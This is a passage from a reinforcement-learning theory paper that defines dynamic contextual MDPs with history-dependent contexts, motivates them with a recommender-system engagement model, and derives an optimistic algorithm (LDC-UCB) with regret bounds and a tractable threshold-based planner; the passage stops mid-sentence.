A DCMDP is given by the tuple \((\mathcal{X},\mathcal{S},\mathcal{A},r,P,H)\), where, \(r:\mathcal{S}\times\mathcal{A}\times\mathcal{X}\mapsto[0,1]\) is a reward function, \(P:\mathcal{H}\times\mathcal{S}\times\mathcal{A}\mapsto\Delta_{\mathcal{S}}\) is a history-dependent transition function, and \(H\) is the horizon. DCMDP dynamics proceeds in discrete episodes \(k=1,2,\ldots,K\). At the beginning of episode \(k\), the agent is initialized at state \(s_{1}^{k}\). At any time \(h\), the agent is in state \(s_{h}^{k}\), has observed a history \(\tau_{h}^{k}=(s_{1}^{k},a_{1}^{k},x_{1}^{k},\ldots,s_{h-1}^{k},a_{h-1}^{k},x_ {h-1}^{k})\in\mathcal{H}_{h}\), and selects an action \(a_{h}^{k}\in\mathcal{A}\). Then, the next context \(x_{h}^{k}\) occurs with (history-dependent) probability \(P(x_{h}^{k}|\tau_{h}^{k})\), the agent receives reward \(r(s_{h}^{k},a_{h}^{k},x_{h}^{k})\), and the environment transitions to state \(s_{h+1}^{k}\) with probability \(P_{h}(s_{h+1}^{k}|s_{h}^{k},a_{h}^{k},x_{h}^{k})\). Note that state transitions are Markov w.r.t. \(s_{h}^{k},a_{h}^{k}\), and the context \(x_{h}^{k}\). A policy \(\pi:\mathcal{S}\times\mathcal{H}\mapsto\Delta_{\mathcal{A}}\) maps states and histories to distributions over actions. 
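To make the interaction protocol concrete, the sketch below (not from the paper) rolls out a single episode of a toy tabular DCMDP. The particular context sampler, reward, and state transition used here are illustrative stand-ins for the unknown \(P\) and \(r\); the only point being illustrated is that the context distribution may depend on the entire history \(\tau_h\).

```python
# One episode of a toy DCMDP (illustrative stand-ins, not the paper's environment).
import numpy as np

rng = np.random.default_rng(0)
S, A, X, H = 4, 3, 2, 10                      # sizes of the state/action/context spaces and horizon

def context_prob(history):                    # stand-in for P(x_h | tau_h): depends on the whole history
    frac = sum(x for _, _, x in history) / (len(history) + 1.0)
    p = np.array([1.0 - 0.5 * frac, 0.5 * frac + 1e-9])
    return p / p.sum()

def policy(s, history):                       # pi(a | s, tau): may also depend on history
    return int(rng.integers(A))

history, s, ret = [], 0, 0.0
for h in range(H):
    a = policy(s, history)
    x = int(rng.choice(X, p=context_prob(history)))   # x_h ~ P(. | tau_h)
    ret += float(x == 0)                               # toy reward r(s_h, a_h, x_h)
    history.append((s, a, x))                          # tau_{h+1} extends tau_h with (s_h, a_h, x_h)
    s = int(rng.integers(S))                           # toy stand-in for P_h(. | s_h, a_h, x_h)
print("episode return:", ret)
```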
The value of \(\pi\) at time \(h\) is defined as \(V_{h}^{\pi}(s,\tau)=\mathbb{E}_{\pi}\Big[\sum_{t=h}^{H}r(s_{t},a_{t},x_{t})\ \Big|\ s_{h}=s,\tau_{h}=\tau\Big]\), where \(a_{t}\sim\pi(s_{t},\tau_{t})\), and \(x_{t}\sim P(\cdot|\tau_{t})\). An optimal policy \(\pi^{*}\) maximizes the value over all states and histories3; we denote its value function by \(V^{*}\). We measure the performance of an RL agent by its _regret_ - the difference between its value and that of an optimal policy: \(\text{Reg}(K)=\sum_{k=1}^{K}\big(V_{1}^{*}(s_{1}^{k})-V_{1}^{\pi^{k}}(s_{1}^{k})\big)\). Footnote 3: Such a value always exists, since all histories can be represented as states of an equivalent MDP, for which an optimal value exists. Figure 1 depicts causal diagrams comparing different types of DCMDPs, including three special cases: Contextual MDPs (Hallak et al., 2015)4, Markov DCMDPs, and logistic DCMDPs (defined in the next two sections). In the next section, we describe a simple instance of DCMDPs, for which contexts are Markov, and show that standard MDP solutions can be applied. Then, in Section 3, we describe a more general DCMDP model, which uses aggregated features to represent histories, for which we provide sample efficient solutions and strong regret guarantees. Footnote 4: To see that Contextual MDPs are a special case of DCMDPs for discrete \(\mathcal{X}\), define \(P(x_{t}|\tau_{t})=\mathds{1}\{x_{t}=x_{t-1}\}\), fixing the context across transitions. ### Markov DCMDPs As a warm-up, we consider a simple version of DCMDPs in which context distributions are Markov w.r.t. the state and previous context. Specifically, we define a _Markov DCMDP_ as a DCMDP which satisfies, for all \(h\in[H]\) and \(\tau_{h}=(x_{1},s_{1},a_{1},\ldots,x_{h-1},s_{h-1},a_{h-1})\in\mathcal{H}_{h}\), \[P(x_{h}|\tau_{h})=P(x_{h}|s_{h-1},a_{h-1},x_{h-1}).\] A Markov DCMDP \(\mathcal{M}=(\mathcal{X},\mathcal{S},\mathcal{A},r,P,H)\) can be reduced to an MDP by augmenting the state space to include the context. To see this, we define the augmented MDP \(\overline{\mathcal{M}}=(\bar{\mathcal{S}},\mathcal{A},\bar{r},\bar{P},H)\), where \(\bar{\mathcal{S}}=\mathcal{S}\times\mathcal{X}\) and \(\bar{r}(\bar{s}_{t},a_{t})=r(s_{t},a_{t},x_{t})\), \(\bar{P}(\bar{s}_{t+1}|\bar{s}_{t},a_{t})=P(s_{t+1}|s_{t},a_{t},x_{t})P(x_{t+1}|s_{t},a_{t},x_{t})\). As a consequence, the Markov DCMDP \(\mathcal{M}\) and the MDP \(\overline{\mathcal{M}}\) have the "same" optimal policy and value, and \(\mathcal{M}\) can be solved using standard RL methods. For instance, using UCBVI (Azar et al., 2017) one can obtain a regret of \(\text{Reg}(K)\leq\tilde{\mathcal{O}}\Big(\sqrt{H^{3}SAXK}\Big)\). Markov DCMDPs also generalize contextual MDPs in an especially simple way; but they fail to capture the history dependence of contexts embodied by general DCMDPs. In the next section, we turn to a special case of DCMDPs that does so, but also admits tractable solution methods. ## 3 Logistic DCMDPs We introduce a general class of DCMDPs, called _logistic DCMDPs_, where history dependence is structured using an aggregation of state-action-context-dependent features. Unlike Markov DCMDPs, logistic DCMDPs allow for context transitions to depend on history. We define the softmax function \(z_{i}:\mathbb{R}^{M}\mapsto[0,1]\), with temperature \(\eta>0\), as \[z_{i}(\mathbf{u})=\frac{\exp(\eta u_{i})}{1+\sum_{m=1}^{M}\exp(\eta u_{m})} \tag{1}\] for \(i\in[M]\), \(\mathbf{u}\in\mathbb{R}^{M}\), and \(z_{M+1}(\mathbf{u})=1-\sum_{i=1}^{M}z_{i}(\mathbf{u})\). 
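Equation (1) can be transcribed directly; the short sketch below (an illustration, not code from the paper) maps an \(M\)-dimensional utility vector to the \(M+1\) context probabilities, with the last entry playing the role of the implicit reference context \(z_{M+1}\).

```python
# z_i(u) from Eq. (1): softmax over M utilities plus an implicit reference category M+1.
import numpy as np

def z(u, eta=1.0):
    """Return (z_1(u), ..., z_M(u), z_{M+1}(u)) for u in R^M."""
    e = np.exp(eta * np.asarray(u, dtype=float))   # no overflow guard; fine for small utilities
    denom = 1.0 + e.sum()
    return np.append(e / denom, 1.0 / denom)       # last entry is z_{M+1} = 1 - sum_i z_i(u)

probs = z([0.5, -1.0, 2.0], eta=0.5)               # M = 3 contexts plus the reference context
assert abs(probs.sum() - 1.0) < 1e-12
```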
**Definition 3.1** (Logistic DCMDP).: A _logistic DCMDP_ with latent feature maps \(\left\{\mathbf{f}_{h}^{*}:\mathcal{S}\times\mathcal{A}\times\mathcal{X}\mapsto \mathbb{R}^{M}\right\}_{h=0}^{H-1}\) is a DCMDP with context space \(\mathcal{X}=\left\{x^{(i)}\right\}_{i=1}^{M+1}\), which satisfies, for all \(h\in[H]\), \(\tau_{h}=(s_{1},a_{1},x_{1},\ldots,s_{h-1},a_{h-1},x_{h-1})\in\mathcal{H}_{h}\), and \(i\in[M+1]\): \[P_{\mathbf{f}^{*}}(x_{h}^{(i)}|\tau_{h})=z_{i}\Biggl{(}\sum_{t=0}^{h-1}\alpha^{h- t-1}\mathbf{f}_{t}^{*}(s_{t},a_{t},x_{t}))\Biggr{)},\] where \(\alpha\in[0,1]\) is a _history discount factor_. Note that the latent functions \(\mathbf{f}_{h}^{*}\) are vector-valued and _unknown_. In a recommender system, \(\mathbf{f}_{h}^{*}\) may represent a user's unknown degree of trust in the system, or the effect of a sequence of recommendations on their satisfaction. The discount \(\alpha\) allows for immediate effects to diminish over time (if less than 1). A logistic DCMDP is denoted by \((\mathcal{X},\mathcal{S},\mathcal{A},r,P,H,\mathbf{f}^{*},\alpha)\). We assume \(\mathbf{f}^{*}\) is \(\ell_{2}\)-bounded with \(\sqrt{\sum f_{h,i}^{*2}(s,a,x)}\leq L\), and we denote \[\mathcal{F}=\{\mathbf{f}:|f_{h,i}(s,a,x)|\leq b_{h,i}(s,a,x)\} \tag{2}\] the (rectangular) set where \(b_{h,i}(s,a,x)\) are upper bounds on \(\mathbf{f}^{*}\). Throughout our analysis we denote the effective history horizon \(H_{\alpha}=\frac{\alpha^{2H}-1}{\alpha-1}\), and without loss of generality scale transitions in \(z_{i}\) (Equation (1)) with temperature \(\eta=H_{\alpha}^{-1}\).5 For clarity, we write \(r(s,a,x^{(i)})=r_{i}(s,a)\), \(P(s^{\prime}|s,a,x^{(i)})=P_{i}(s^{\prime}|s,a)\), and \(\mathbf{r}(s,a)=(r_{1}(s,a),\ldots,r_{M+1}(s,a))^{T}\), \(\mathbf{P}(s^{\prime}|s,a)=(P_{1}(s^{\prime}|s,a),\ldots,P_{M+1}(s^{\prime}|s,a))^ {T}\). We also denote by \(n_{h}^{k}(s,a,x)\) the number of visits to \(s,a,x\) at time step \(h\) of episode \(k-1\). Footnote 5: We set \(\eta=H_{\alpha}^{-1/2}\) for convenience. Different choices of \(\eta\) are equivalent to varying the bounds on \(\mathcal{F}\) in Equation (2). Next, we define a sufficient statistic for logistic DCMDPs that will prove valuable in our solution methods that follow. **Definition 3.2** (Sufficient Statistic).: Given a logistic DCMDP with feature maps \(\mathbf{f}\), define \(\mathbf{\sigma}:\mathcal{H}\mapsto R^{M}\) as \(\mathbf{\sigma}(\tau_{h};\mathbf{f}):=\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{f}_{t}(s_{t}, a_{t},x_{t})\), and the set of sufficient statistics by \(\mathbf{\Sigma}(\mathbf{f}):=\{\mathbf{\sigma}(\tau;\mathbf{f})\}_{\tau\in\mathcal{H}}\). In Appendix B.1, we prove that \(\mathbf{\sigma}(\tau_{h};\mathbf{f})\) is a sufficient statistic of the history for purposes of computing the optimal policy at time \(h\). We do so by defining an equivalent MDP with state space \(\mathcal{S}\times\mathbf{\Sigma}(\mathbf{f})\) with well-defined dynamics and reward, and an equivalent optimal policy, which achieves the same optimal value. Finally, similar to previous work on logistic and multinomial bandits (Abeille et al., 2021; Amani and Thrampoulidis, 2021), we define a problem-dependent constant for logistic DCMDPs which plays a key role in characterizing the behavior of \(M\geq 1\) multinomial logit bandit algorithms. 
For \(\mathbf{x}\in\mathbb{R}^{M+1}\) and \(\tau\in\mathcal{H}\), let \(\mathbf{z}(\mathbf{x})=(z_{0}(\mathbf{x}),\ldots,z_{M+1}(\mathbf{x}))^{T}\), \(\mathbf{A}(\mathbf{\tau};\mathbf{f})=\text{diag}(\mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f})))- \mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f}))\mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f}))^{T}\), and \(1/\kappa=\inf_{\tau\in\mathcal{H}}\lambda_{\min}\{\mathbf{A}(\mathbf{\tau};\mathbf{f}^{*})\}\). Informally, \(\kappa\) is related to saturation of the softmax \(z_{i}\). For logistic DCMDPs, it is related to a worst-case context distribution w.r.t. \(\mathbf{f}^{*}\) and \(\tau\in\mathcal{H}\). We refer to Abeille et al. (2021); Amani and Thrampoulidis (2021) for details, as well as lower bounds using this constant in logistic bandits. The Rescorla-Wagner Model in Recommenders.Before continuing to provide sample efficient methods for solving logistic DCMDPs, we turn to motivate the aggregated model of history through the lens of the Rescola-Wagner (RW) model (Rescorla, 1972) in a recommendation setting. Logistic DCMDPs generate context transitions based on the sum of specific features of prior states, actions, and contexts, as captured by \(\mathbf{f}^{*}\), with backward discounting to diminish the effect of past features or experiences, as captured by \(\alpha\). Such a model can be used to capture a (very simple) RW formulation of user behavior in an interactive recommender system. Let \(I=\{i_{1},\ldots,i_{n}\}\) be a set of items. A user may like, dislike, or be unfamiliar with any of these items, represented by \(u\in\{1,0,-1\}^{n}\). Let \(g_{t}\) be the user's (latent) current degree of satisfaction or engagement with the system. At each time \(t\), the system asks the user for their disposition (e.g., rating) of an item \(i_{t}\in I\). The user decides to answer the question with probability \(z_{1}(g_{t})\) (Equation (1)), which is strictly increasing with higher degrees of engagement level. The engagement level then evolves as \(g_{t+1}=\alpha g_{t}+\beta u_{i_{t}}\), where \(\alpha\in[0,1]\), and \(\beta\) is a user-specific sensitivity factor. This model gives rise to a logistic DCMDP, whose solution gives the optimal recommender system policy. Specifically, actions \(a_{t}:=i_{t}\in I\) are the questions asked by the system, \(f^{*}(s_{t},a_{t},x_{t})=\beta u_{a_{t}}\) depends only on \(a_{t}\), user engagement is \(g_{h}=\sum_{t=0}^{h-1}\alpha^{h-t-1}f^{*}(s_{t},a_{t},x_{t})=\sum_{t=0}^{h-1} \alpha^{h-t-1}\beta u_{i_{t}}\), \(x_{t}\) is the decision whether to answer, and \(s_{t}\) is the observation of the answer. ## 4 Optimistic Methods for Logistic DCMDPs Logistic DCMDPs' aggregation of features allow us to obtain sample efficient and computationally tractable solutions; namely, solutions which do not depend exponentially on history. In this section, we describe an optimistic algorithm for solving logistic DCMDPs and provide regret bounds. We focus on theoretical motivations here, and address computational tractability in the next section. We first develop _Logistic Dynamic Context Upper Confidence Bound (LDC-UCB)_, a general RL method for logistic DCMDPs with unknown latent features (see Algorithm 1). 
At each episode \(k\), LDC-UCB uses estimates of rewards \(\hat{r}^{k}_{x,h}(s,a)=\frac{\sum_{k^{\prime}=1}^{k}\boldsymbol{1}\left\{x_{h}^{k^{\prime}}=x,s_{h}^{k^{\prime}}=s,a_{h}^{k^{\prime}}=a\right\}r_{h}^{k^{\prime}}}{n_{h}^{k}(s,a,x)}\), transitions \(\hat{P}^{k}_{x,h}(s^{\prime}|s,a)=\frac{\sum_{k^{\prime}=1}^{k}\boldsymbol{1}\left\{x_{h}^{k^{\prime}}=x,s_{h}^{k^{\prime}}=s,a_{h}^{k^{\prime}}=a,s_{h+1}^{k^{\prime}}=s^{\prime}\right\}}{n_{h}^{k}(s,a,x)}\), and a projected estimate of \(\hat{\boldsymbol{f}}\), calculated by maximizing the regularized log-likelihood: \[\mathcal{L}^{k}_{\lambda}(\boldsymbol{f})=\sum_{k^{\prime}=1}^{k}\sum_{h=1}^{H-1}\sum_{i=1}^{M+1}\mathds{1}\big\{x_{h}^{k^{\prime}}=i\big\}\ell_{i,h}^{k^{\prime}}(\boldsymbol{f})-\lambda\left\|\boldsymbol{f}\right\|_{2}^{2}, \tag{3}\] where \(\ell_{i,h}^{k^{\prime}}(\boldsymbol{f})=\log\bigl(z_{i}(\boldsymbol{\sigma}(\tau_{h}^{k^{\prime}};\boldsymbol{f}))\bigr)\), \(\lambda>0\), and recall that \(\boldsymbol{\sigma}(\tau_{h}^{k^{\prime}};\boldsymbol{f})=\sum_{t=0}^{h-1}\alpha^{h-t-1}\boldsymbol{f}_{t}(s_{t}^{k^{\prime}},a_{t}^{k^{\prime}},x_{t}^{k^{\prime}})\). We account for uncertainty in these estimates by incorporating optimism. For rewards and transitions, we add a bonus term \(b_{i,h}^{k}\) (see Appendix C for explicit definitions) to the estimated reward (line 2). To incorporate optimism in the latent features \(\hat{\boldsymbol{f}}\), we build on results from multinomial logistic bandits (Amani and Thrampoulidis, 2021). Specifically, we derive a confidence bound over \(\hat{\boldsymbol{f}}\), which holds with probability at least \(1-\delta\): \[\left\|g_{k}(\boldsymbol{f}^{*})-g_{k}(\hat{\boldsymbol{f}}_{t})\right\|_{\boldsymbol{H}_{k}^{-1}(\boldsymbol{f}^{*})}\leq\beta_{k}(\delta), \tag{4}\] where \(H_{k}(\boldsymbol{f})=-\nabla_{\boldsymbol{f}}^{2}\mathcal{L}^{k}_{\lambda}(\boldsymbol{f})\), \(g_{k}(\boldsymbol{f})=-\nabla_{\boldsymbol{f}}\mathcal{L}^{k}_{\lambda}(\boldsymbol{f})+D_{k}\), and \(\beta_{k}(\delta)=\frac{M^{5/2}SAH}{\sqrt{\lambda}}\bigl(\log\bigl(1+\frac{k}{d\lambda}\bigr)+2\log\bigl(\frac{2}{\delta}\bigr)\bigr)+\sqrt{\frac{\lambda}{4M}}+\sqrt{\lambda}L\). See Appendix G for exact expressions and a proof of the bound in Equation (4). Next, we leverage the bound in Equation (4) to construct a feasible set of logistic DCMDPs. Specifically, we define the confidence set \[\mathcal{C}_{k}(\delta)=\bigg\{\boldsymbol{f}\in\mathcal{F}:\left\|g_{k}(\boldsymbol{f})-g_{k}(\hat{\boldsymbol{f}}_{t})\right\|_{\boldsymbol{H}_{k}^{-1}(\boldsymbol{f})}\leq\beta_{k}(\delta)\bigg\}, \tag{5}\] and the following set of logistic DCMDPs: \[\bar{\mathcal{M}}_{k}(\delta)=\Big\{\Big(\mathcal{X},\mathcal{S},\mathcal{A},\bar{r},\hat{P},H,\boldsymbol{f},\alpha\Big):\boldsymbol{f}\in\mathcal{C}_{k}(\delta)\Big\}. \tag{6}\] The optimistic policy \(\bar{\pi}^{k}\) (line 3) is the one with the greatest value over all DCMDPs in \(\bar{\mathcal{M}}_{k}(\delta)\), i.e., the \(\bar{\pi}^{k}\) corresponding to \(\max_{\bar{m}\in\bar{\mathcal{M}}_{k}(\delta)}V^{*}(s_{1};\bar{m})\). Combining the above, we prove the following regret guarantee for Algorithm 1. **Theorem 4.1**.: _Let \(\lambda=\Theta\bigl(\frac{HM^{2.5}SA}{L}\bigr)\). With probability at least \(1-\delta\), the regret of Algorithm 1 is_ \[\operatorname{Reg}(K)\leq\tilde{\mathcal{O}}(\sqrt{H^{6}M^{4.5}S^{2}A^{2}L^{2}\kappa K}).\] The proof of Theorem 4.1 can be found in Appendix C. 
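As a rough illustration of the estimation step, the regularized log-likelihood of Equation (3) can be maximized by gradient ascent, maintaining the sufficient statistic with the recursion \(\boldsymbol{\sigma}\leftarrow\alpha\boldsymbol{\sigma}+\boldsymbol{f}_{h}(s_{h},a_{h},x_{h})\) from Definition 3.2. The sketch below is a toy, unconstrained variant: the projection onto the confidence set \(\mathcal{C}_{k}(\delta)\) (and onto the rectangular set \(\mathcal{F}\) used in Section 5) is replaced by simple clipping, \(\eta=1\), and the dimensions and trajectories are made up for illustration only.

```python
# Toy gradient-ascent sketch for the regularized maximum likelihood of Eq. (3); not the paper's code.
import torch

M, S, A, H, alpha, lam, bound = 3, 5, 2, 8, 0.9, 1.0, 2.0
f = torch.zeros(H, S, A, M + 1, M, requires_grad=True)     # estimate of f_h(s, a, x) in R^M
opt = torch.optim.Adam([f], lr=0.05)

# Toy observed episodes: lists of (s_h, a_h, x_h); x in {0, ..., M}, with index M the reference context.
data = [[(0, 0, 0), (1, 1, 3), (2, 0, 1)],
        [(0, 1, 2), (3, 0, 0), (4, 1, 3)]]

def neg_log_lik():
    nll = lam * (f ** 2).sum()                              # negated -lambda * ||f||^2 term of Eq. (3)
    for traj in data:
        sigma = torch.zeros(M)
        for h, (s, a, x) in enumerate(traj):
            logits = torch.cat([sigma, torch.zeros(1)])     # utilities of contexts 1..M and reference M+1
            nll = nll - torch.log_softmax(logits, dim=0)[x] # -log z_{x_h}(sigma(tau_h; f))
            sigma = alpha * sigma + f[h, s, a, x]           # sigma update from Definition 3.2
    return nll

for _ in range(200):
    opt.zero_grad()
    loss = neg_log_lik()
    loss.backward()
    opt.step()
    with torch.no_grad():
        f.clamp_(-bound, bound)                             # crude stand-in for the projection step
```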
We note that computing the optimistic policy over \(\bar{\mathcal{M}}_{k}(\delta)\) (line 3) is computationally difficult, especially due the history dependence of \(\pi\) on the accumulated latent features \(\sum_{t=1}^{h}\alpha^{h-t}\boldsymbol{f}(s_{t},a_{t},x_{t})\). We address this challenge next. ## 5 Mitigating Computational Complexity In this section we show how to relax LDC-UCB (Algorithm 1) to mitigate its high computational complexity. Importantly, we maintain regret guarantees similar to those of Theorem 4.1 while obtaining an exponential improvement to computational cost. We later use these results to construct a practical model-based algorithm in Section 6. To address the computational challenges of Algorithm 1, we focus on two problems. The first involves the set \(\mathcal{C}_{k}(\delta)\) (Equation (5) and line 5 of Algorithm 1) - where computation of the maximum likelihood constrained to set \(\mathcal{C}_{k}(\delta)\) is intractable. To address this, we prove that the constraint on the maximum likelihood estimator can be replaced by a simpler, rectangular set, enabling efficient calculation of the projected maximum likelihood. The second challenge is the complexity of the optimistic planner (Equation (6) and line 3 of Algorithm 1). To overcome this, we develop a _local_ confidence bound, for every state-action-context triple \((s,a,x)\), and show it can be leveraged to design an optimistic planner, using a novel thresholding mechanism for optimism in logistic DCMDPs. Pseudocode for this tractable variant of LDC-UCB is presented in Algorithm 2. ### A Tractable Estimator We begin by constructing a tractable estimator for the latent feature maps \(\mathbf{f}^{*}\) which, instead of projecting to the set \(\mathcal{C}_{k}(\delta)\), solves for projected maximum likelihood on the rectangular set \(\mathcal{F}\) (Equation (2)). Let \(\gamma_{k}(\delta)=\Big{(}2+2L\sqrt{MH}+\sqrt{2(1+L)}\Big{)}\beta_{k}\,+\,\sqrt {\frac{2(1+L)HM}{\lambda}}\beta_{k}^{2}(\delta)\). We define the tractable maximum likelihood estimator \(\hat{\mathbf{f}}^{k}_{T}\in\arg\max_{\mathbf{f}\in\mathcal{F}}\mathcal{L}_{\lambda}^{ k}(\mathbf{f}),\) and have the following bound. **Lemma 5.1**.: _With probability at least \(1-\delta\), for all \(k\in[K]\),_ \[\Big{\|}\hat{\mathbf{f}}^{k}_{T}-\mathbf{f}^{*}\Big{\|}_{\mathbf{H}_{k}(\mathbf{f}^{*})}\leq \gamma_{k}(\delta). \tag{7}\] The proof (see Appendix G.2) uses a convex relaxation of the set \(\mathcal{C}_{k}(\delta)\). Notice that the confidence region for \(\hat{\mathbf{f}}^{k}_{T}\) is looser than that for \(\hat{\mathbf{f}}^{k}\) (see Equation (4)), as \(\beta_{k}(\delta)<\gamma_{k}(\delta)\). Nevertheless, its computation is tractable. Next we can exploit the confidence bound in Equation (7) to construct a _local_ bound for every state-action-context triple \((s,a,x)\) using the number of visits to \((s,a,x)\), i.e., \(n^{k}_{h}(s,a,x)\). The following result uses structural properties of logistic DCMDPs to achieve a local bound for \(\hat{\mathbf{f}}^{k}_{T}\). Its proof generalizes the local confidence bound in Tennenholtz et al. (2022), and can be found in Appendix G.3. 
**Lemma 5.2** (Local Estimation Confidence Bound).: _For any \(\delta>0\), with probability of at least \(1-\delta\), for all \(k\in[K],h\in[H],i\in[M]\) and \(s,a,x\in\mathcal{S}\times\mathcal{A}\times\mathcal{X}\), it holds that_ \[\Big{|}\big{(}\hat{\mathbf{f}}^{k}_{T}(s,a,x)\big{)}_{i,h}-\big{(}\mathbf{f}^{*}(s,a,x )\big{)}_{i,h}\Big{|}\leq\frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_ {h}(s,a,x)+4\lambda}}.\] Lemma 5.2 allows one to reason about the unknown features locally for any visited \((s,a,x)\), a vital step toward an efficient optimistic planner. Indeed, as we see in the next section, the cost of planning in logistic DCMDPs can be reduced significantly using this bound. ### Threshold Optimistic Planning We now address the major computational challenge of Algorithm 1 - the complexity of optimistic planning (line 3 of Algorithm 1). To do this, we leverage the local bound in Lemma 5.2 and construct an optimistic planner using a novel threshold mechanism, as we describe next. Recall the set of sufficient statistics \(\mathbf{\Sigma}(\mathbf{f})=\{\mathbf{\sigma}(\tau;\mathbf{f})\}_{\tau\in\mathcal{H}}\) (Definition 3.2), which is a finite, vector-valued set with cardinality \(|\mathbf{\Sigma}(\mathbf{f})|=\mathcal{O}\big{(}(SAMH)^{MH}\big{)}\), making planning in state space \(S\times\mathbf{\Sigma}\) exponentially hard. Consequently, searching for the optimistic DCMDP in the space of feature maps satisfying \(\mathbf{f}\in\mathcal{C}_{k}(\delta)\) (Equation (6)) requires searching over an exponentially large space. We mitigate this problem exponentially, by leveraging the local confidence bound in Lemma 5.2. Let \(\mathcal{B}_{k}(\delta)\subset\mathbb{R}^{M}\times\mathbb{R}^{M}\) be the rectangular cuboid of all candidate confidence intervals satisfying the bound in Lemma 5.2. That is, \(\mathcal{B}_{k}(\delta)\) is the set of all \(M\) dimensional intervals \(\Big{[}\hat{\mathbf{l}}^{k}_{h}(s,a,x),\mathbf{u}^{k}_{h}(s,a,x)\Big{]}\), such that for all \(h,s,a,x\), \(\mathbf{f}^{*}_{h}(s,a,x)\in\Big{[}\mathbf{l}^{k}_{h}(s,a,x),\mathbf{u}^{k}_{h}(s,a,x)\Big{]}\), where, \(\mathbf{u}^{k}_{h}(s,a,x),\mathbf{l}^{k}_{h}(s,a,x)=\hat{\mathbf{f}}^{k}_{T}\pm\bigg{(} \frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_{h}(s,a,x^{(1)})+4\lambda} },\dots,\frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_{h}(s,a,x^{(M)})+4 \lambda}}\bigg{)}^{T}\). In what follows, we identify key characteristics of the optimistic value when optimized over \(\mathcal{B}_{k}(\delta)\). Specifically, we show that an optimistic solution lies on the extreme points of \(\mathcal{B}_{k}(\delta)\), but more importantly, at one of \(M\)_specific extreme points_. This limits the search required by optimistic planning to a much smaller set, which can be approximated effectively in practice. Optimism in intervals.Instead of augmenting the state space with \(\mathbf{\Sigma}(\mathbf{f})\), we use the set of confidence intervals defined by \(\mathcal{B}_{k}(\delta)\). We denote by \(\mathbf{CI}^{k}_{h}:\mathbf{\Sigma}(\hat{\mathbf{f}}^{k})\mapsto\mathbb{R}^{M}\times \mathbb{R}^{M}\) the confidence interval of the sufficient statistic \(\mathbf{\sigma}(\tau^{k}_{h},\hat{\mathbf{f}}^{k})\). 
That is, \[\mathbf{CI}^{k}_{h}=\mathbf{CI}(\mathbf{\sigma}(\tau^{k}_{h};\hat{\mathbf{f}}^{k}))\] \[=\left[\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{l}^{k}_{h}(s^{k}_{t},a^{k }_{t},x^{k}_{t}),\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{u}^{k}_{h}(s^{k}_{t},a^{k}_{ t},x^{k}_{t})\right]\!.\] We also denote by \(\mathbf{\mathcal{I}}^{k}=\Big{\{}\mathbf{CI}(\mathbf{\sigma}(\tau,\hat{\mathbf{f}}^{k}_{T})) \Big{\}}_{\tau\in\mathcal{H}}\) the set of possible confidence intervals over \(\mathcal{B}_{k}(\delta)\) in episode \(k\). Next, we augment the state space \(\mathcal{S}\) at every episode \(k\) by \(\mathcal{S}\times\mathbf{\mathcal{I}}^{k}\), and define the augmented state-action optimistic value for context \(i\in[M+1]\) and confidence interval \(\mathbf{CI}^{k}_{h}=\mathbf{CI}(\mathbf{\sigma}(\tau^{k}_{h},\mathbf{f}^{k}))\) at time step \(h\in[H]\) by \[\bar{Q}_{i}(s,a,\mathbf{CI}^{k}_{h}))=\bar{r}_{i}(s,a)+\mathbb{E}_{s^{\prime}\sim \hat{P}_{i}(\cdot|s,a)}\Big{[}\bar{V}_{h+1}(s^{\prime},\mathbf{CI}^{k}_{h+1})\Big{]},\] where, with slight abuse of notation, we used \(\mathbf{CI}^{k}_{h+1}=\mathbf{CI}\Big{(}\mathbf{\sigma}\Big{(}\tau^{k}_{h}\cup\big{\{}s,a,x ^{(i)}\big{\}},\hat{\mathbf{f}}^{k}_{T}\Big{)}\Big{)}\) to denote the next aggregated confidence interval. The optimistic value \(\bar{V}_{h}\) is defined by maximizing over sufficient statistics in the confidence set \(\mathbf{CI}^{k}_{h}\) and \(a\in\mathcal{A}\). That is, \[\bar{V}_{h}(s,\mathbf{CI}^{k}_{h})=\max_{a\in\mathcal{A}}\max_{\mathbf{\sigma}\in\mathbf{CI }^{k}_{h}}\sum_{i=1}^{M+1}z_{i}(\mathbf{\bar{\sigma}})Q_{i}(s,a,\mathbf{CI}^{k}_{h}) \tag{8}\] Indeed, \(\bar{V}_{h}\) is an optimistic value, as shown by the following proposition. Its proof is provided in Appendix D.3. **Proposition 5.3** (Optimistic Value).: _Let \(\bar{V}_{h}\) as defined in Equation (8). Then, w.h.p. \(\bar{V}_{1}(s^{k}_{t},\mathbf{CI}^{k}_{h})\geq V_{1}^{*}(s^{k}_{t})\)._ Next, we turn to show that the maximization problem in Equation (8) can be solved efficiently, though \(\mathbf{CI}_{h}^{k}\) is an exponentially large set. Notice that the inner term \(\sum_{i=0}^{M}z_{i}(\bar{\mathbf{\sigma}})Q_{i}(s,a,\mathbf{CI}_{h}^{k})\) in Equation (8) is not convex. Still, our analysis shows that a solution to the inner maximization problem lies in the set of extreme points of \(\mathbf{CI}_{h}^{k}\). That said, these \(2^{M}\) extreme points make exhaustive search intractable. Fortunately, we can also show that the optimal solution lies in a space of exactly \(M\) solutions - a linearly sized, tractable search space. To this end, we define the threshold set, which we will use to construct the (linear) set of feasible extreme points. **Definition 5.4**.: For a rectangular cuboid defined by the interval \(\mathbf{CI}=[\mathbf{l},\mathbf{u}]\subseteq\mathbb{R}^{M+1}\times\mathbb{R}^{M+1}\), vector \(\mathbf{y}\in\mathbb{R}^{M+1}\) and real number \(t\in\mathbb{R}\) we define \(\mathbf{th}_{t}(\mathbf{y},\mathbf{CI})\in\mathbb{R}^{M+1}\) by \[\left[\mathbf{th}_{t}(\mathbf{y},\mathbf{CI})\right]_{i}=\begin{cases}l_{i}&y_{i}<t\\ u_{i}&\text{o.w.}\end{cases}\] **Definition 5.5**.: For a vector \(\mathbf{Q}\in\mathbb{R}^{M+1}\), we define the threshold set \(\mathcal{T}(\mathbf{Q})=\left\{\frac{Q_{i}+Q_{i+1}}{2}\right\}_{i=1}^{M}\). We use these definitions to show that the optimal solution to Equation 